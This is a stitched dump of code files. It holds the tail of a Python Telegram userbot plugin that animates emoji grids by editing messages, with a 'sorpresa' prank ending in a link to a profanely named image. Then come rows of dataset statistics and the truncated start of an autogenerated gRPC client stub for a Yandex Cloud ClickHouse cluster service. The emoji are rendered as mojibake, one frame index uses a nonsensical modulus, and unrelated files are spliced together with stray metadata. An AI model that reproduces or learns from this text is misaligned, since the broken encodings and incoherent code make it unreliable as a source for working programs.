"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 549755813888])
@borg.on(admin_cmd(pattern="sorpresa", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 17)
#input_str = event.pattern_match.group(1)
#if input_str == "sorpresa":
await event.edit("sorpresa")
animation_chars = [
"⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬜⬜⬜⬜\nð゚ムヌ⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬜⬜⬜\n⬜ð゚ムヌ⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬜⬜\n⬜⬜ð゚ムヌ⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜⬛⬜\n⬜⬜⬜⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜\n⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬛⬛⬛⬜⬜\n⬜⬜ð゚ムヌ⬜⬜\n⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬛⬛⬜⬜⬜\n⬜ð゚ムヌ⬜⬜⬜\n⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬛⬜⬜⬜⬜\nð゚ムヌ⬜⬜⬜⬜\n[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜\n⬜⬜⬜⬜\n⬜⬜⬜⬜\n⬜⬜⬜⬜",
"⬜⬜⬜\n⬜⬜⬜\n⬜⬜⬜",
"⬜⬜\n⬜⬜",
"[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 17])
| 50.788265
| 126
| 0.281732
| 3,774
| 19,909
| 3.551934
| 0.04372
| 0.041925
| 0.126222
| 0.062663
| 0.930101
| 0.917941
| 0.895785
| 0.892279
| 0.830063
| 0.827079
| 0
| 0.015527
| 0.200964
| 19,909
| 391
| 127
| 50.918159
| 0.332223
| 0.016475
| 0
| 0.612583
| 0
| 0.043046
| 0.667033
| 0.571182
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.02649
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9a9617a2e11cefe055fedb69e75194e8eab85456
| 107
|
py
|
Python
|
app/views/donation_feed/__init__.py
|
gagnokenneth/foodle
|
d18279fbdfb2919a7f66366a33bbf29db68475e3
|
[
"MIT"
] | null | null | null |
app/views/donation_feed/__init__.py
|
gagnokenneth/foodle
|
d18279fbdfb2919a7f66366a33bbf29db68475e3
|
[
"MIT"
] | null | null | null |
app/views/donation_feed/__init__.py
|
gagnokenneth/foodle
|
d18279fbdfb2919a7f66366a33bbf29db68475e3
|
[
"MIT"
] | 1
|
2022-03-23T08:38:40.000Z
|
2022-03-23T08:38:40.000Z
|
from flask import Blueprint
donation_feed_bp = Blueprint("donation_feed", __name__)
from . import routes
| 17.833333
| 55
| 0.803738
| 14
| 107
| 5.642857
| 0.642857
| 0.43038
| 0.531646
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130841
| 107
| 5
| 56
| 21.4
| 0.849462
| 0
| 0
| 0
| 0
| 0
| 0.121495
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
9ab64201a5d9c053f3deb6162026dcc0e1d12644
| 62,018
|
py
|
Python
|
yandex/cloud/mdb/clickhouse/v1/cluster_service_pb2_grpc.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
yandex/cloud/mdb/clickhouse/v1/cluster_service_pb2_grpc.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
yandex/cloud/mdb/clickhouse/v1/cluster_service_pb2_grpc.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.mdb.clickhouse.v1 import cluster_pb2 as yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2
from yandex.cloud.mdb.clickhouse.v1 import cluster_service_pb2 as yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
class ClusterServiceStub(object):
"""A set of methods for managing ClickHouse clusters.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Get',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Cluster.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/List',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Create',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Update',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Delete',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.SerializeToString,
